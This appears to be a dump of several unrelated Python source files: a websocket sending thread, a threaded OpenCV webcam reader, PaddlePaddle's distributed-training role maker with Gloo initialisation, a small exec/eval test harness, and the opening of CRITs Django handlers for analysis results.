'Was not able to establish a connection with the server, '
'please try to run again. If that fails,'
'please ensure that your local device has the correct SSL '
'certs installed.'
)
try:
self._send_world_alive()
except Exception:
pass
time.sleep(self.PING_RATE / 2)
# Start sending thread
self.send_thread = threading.Thread(
target=self.channel_thread, name='Main-Socket-Send-Thread'
)
self.send_thread.daemon = True
self.send_thread.start()
def channel_thread(self):
"""Handler thread for monitoring all channels"""
# while the thread is still alive
while not self.is_shutdown:
if self.ws is None:
# Waiting for websocket to come back alive
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
continue
self._try_send_world_ping()
try:
# Get first item in the queue, check if can send it yet
item = self.sending_queue.get(block=False)
t = item[0]
if time.time() < t:
# Put the item back into the queue,
# it's not time to pop yet
self.sending_queue.put(item)
else:
# Try to send the packet
packet = item[1]
if not packet:
# This packet was deleted out from under us
continue
if packet.status is not Packet.STATUS_SENT:
# either need to send initial packet
# or resend after a failed send
self._send_packet(packet, t)
except Empty:
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Unexpected error occurred in socket handling thread: '
'{}'.format(repr(e)),
should_print=True,
)
# Inividual channel accessors are useful for testing
def open_channel(self, worker_id, assignment_id):
"""Opens a channel for a worker on a given assignment, doesn't re-open
if the channel is already open."""
connection_id = '{}_{}'.format(worker_id, assignment_id)
self.open_channels.add(connection_id)
self.worker_assign_ids[connection_id] = (worker_id, assignment_id)
def close_channel(self, connection_id):
"""Closes a channel by connection_id"""
shared_utils.print_and_log(
logging.DEBUG, 'Closing channel {}'.format(connection_id)
)
if connection_id in self.open_channels:
self.open_channels.remove(connection_id)
with self.packet_map_lock:
packet_ids = list(self.packet_map.keys())
# Clear packets associated with this sender
for packet_id in packet_ids:
packet = self.packet_map[packet_id]
packet_conn_id = packet.get_receiver_connection_id()
if connection_id == packet_conn_id:
del self.packet_map[packet_id]
def close_all_channels(self):
"""Closes all channels by clearing the list of channels"""
shared_utils.print_and_log(logging.DEBUG, 'Closing all channels')
connection_ids = list(self.open_channels)
for connection_id in connection_ids:
self.close_channel(connection_id)
def socket_is_open(self, connection_id):
return connection_id in self.open_channels
def queue_packet(self, packet):
"""Queues sending a packet to its intended owner"""
shared_utils.print_and_log(
logging.DEBUG, 'Put packet ({}) in queue'.format(packet.id)
)
# Get the current time to put packet into the priority queue
with self.packet_map_lock:
self.packet_map[packet.id] = packet
item = (time.time(), packet)
self.sending_queue.put(item)
return True
def get_status(self, packet_id):
"""Returns the status of a particular packet by id"""
with self.packet_map_lock:
if packet_id not in self.packet_map:
return Packet.STATUS_NONE
return self.packet_map[packet_id].status
def shutdown(self):
"""marks the socket manager as closing, shuts down all channels"""
self.is_shutdown = True
self.close_all_channels()
self.keep_running = False
self._ensure_closed()
|
WebcamVideoStream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
print("start http_server: {}, {}".format(port, size_d))
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running",
False) or not http_server.should_stop():
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
worker_key = prefix + '_' + 'worker'
size_d = {worker_key: self._worker_num, }
print("worker_key:{}, size: {}".format(worker_key, size_d))
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, 'worker')
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
print("to start http_server")
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
# TODO (sandyhouse): initialize gloo for server and all
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
string: all heter_trainers'endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
retrun the current number of worker
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_local_rank(self):
if not self._role_is_generated:
self._generate_role()
return self._local_rank
def _get_local_device_ids(self):
if not self._role_is_generated:
self._generate_role()
return self._local_device_ids
def _get_world_device_ids(self):
if not self._role_is_generated:
self._generate_role()
return self._world_device_ids
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
Return True if indispensable environment for fleetrun is not found
(use python-run to launch fleet-code directly)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._local_rank = os.getenv("PADDLE_RANK_IN_NODE")
self._local_device_ids = os.getenv("PADDLE_LOCAL_DEVICE_IDS")
self._world_device_ids = os.getenv("PADDLE_WORLD_DEVICE_IDS")
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
if self._is_server() and self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
|
process_tester.py
|
import multiprocessing
def tester(command_q, result_q):
while True:
op, cmd = command_q.get()
try:
if op == 'terminate':
break
if op == 'exec':
exec(cmd)
result_q.put((0, None))
if op == 'eval':
res = eval(cmd)
result_q.put((0, res))
except Exception as e:
result_q.put((1, e))
class Tester:
def __enter__(self):
self.command_q = multiprocessing.Queue()
self.result_q = multiprocessing.Queue()
self.p = multiprocessing.Process(target=tester, args=(self.command_q, self.result_q))
self.p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.command_q.put(('terminate', ''))
self.command_q.close()
self.result_q.close()
# self.p.join() TODO
def exec(self, command, timeout=1):
self.command_q.put(('exec', command))
exception, res = self.result_q.get(timeout=timeout)
if exception:
raise res
def eval(self, command, timeout=1):
self.command_q.put(('eval', command))
exception, res = self.result_q.get(block=True, timeout=timeout)
if exception:
self.close()
raise res
else:
return res
def close(self):
self.command_q.put(('terminate', ''))
self.command_q.close()
self.result_q.close()
self.p.join()
|
handlers.py
|
import ast
import datetime
import json
import logging
import copy
from django.http import HttpResponse
from multiprocessing import Process
from threading import Thread, local
try:
from mongoengine.base import ValidationError
except ImportError:
from mongoengine.errors import ValidationError
from multiprocessing.pool import Pool, ThreadPool
from django.core.urlresolvers import reverse
from django.conf import settings
from django.shortcuts import render_to_response
from django.template import RequestContext
import crits.services
from crits.core.class_mapper import class_from_type, class_from_id
from crits.core.crits_mongoengine import json_handler
from crits.core.handlers import build_jtable, csv_export
from crits.core.handlers import jtable_ajax_list, jtable_ajax_delete
from crits.core.user_tools import user_sources
from crits.services.analysis_result import AnalysisResult, AnalysisConfig
from crits.services.analysis_result import EmbeddedAnalysisResultLog
from crits.services.core import ServiceConfigError, AnalysisTask
from crits.services.service import CRITsService
logger = logging.getLogger(__name__)
def generate_analysis_results_csv(request):
"""
Generate a CSV file of the Analysis Results information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,AnalysisResult)
return response
def generate_analysis_results_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = AnalysisResult
type_ = "analysis_result"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Analysis Results",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtlist',)),
'deleteurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def service_work_handler(service_instance, final_config):
"""
Handles a unit of work for a service by calling the service's "execute"
method. This function is generally called by processes/threads. Also
this function is needed because it is picklable and passing in the
service_instance.execute method is not picklable because it is an
instance method.
:param service_instance: The service instance that the work will be performed in
:type service_instance: crits.services.core.Service
:param service_instance: The service's configuration settings
:type service_instance: dict
"""
service_instance.execute(final_config)
def run_service(name, type_, id_, user, obj=None,
execute='local', custom_config={}, is_triage_run=False, **kwargs):
"""
Run a service.
:param name: The name of the service to run.
:type name: str
:param type_: The type of the object.
:type type_: str
:param id_: The identifier of the object.
:type id_: str
:param user: The user running the service.
:type user: str
:param obj: The CRITs object, if given this overrides crits_type and identifier.
:type obj: CRITs object.
:param analyst: The user updating the results.
:type analyst: str
:param execute: The execution type.
:type execute: str
:param custom_config: Use a custom configuration for this run.
:type custom_config: dict
"""
result = {'success': False}
if type_ not in settings.CRITS_TYPES:
result['html'] = "Unknown CRITs type."
return result
if name not in enabled_services():
result['html'] = "Service %s is unknown or not enabled." % name
return result
service_class = crits.services.manager.get_service_class(name)
if not service_class:
result['html'] = "Unable to get service class."
return result
if not obj:
obj = class_from_id(type_, id_)
if not obj:
result['html'] = 'Could not find object.'
return result
